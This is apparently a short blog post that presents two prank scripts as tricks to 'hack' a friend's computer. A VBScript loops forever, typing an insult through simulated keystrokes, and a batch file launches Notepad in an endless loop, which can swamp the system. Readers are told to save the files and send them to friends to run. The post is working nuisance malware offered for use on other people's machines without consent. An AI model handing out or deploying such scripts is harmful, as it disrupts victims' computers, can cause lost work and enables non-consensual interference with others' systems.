To do above tricks :
open notepad and copy paste above code and save it as Anything.VBS.
send it to your friends :
Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop
Save it as "Anything.VBS" and send it.
Another one :
Open Notepad continually in your friend's computer:
Trick
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as "Anything.BAT" and send it.
No comments:
Post a Comment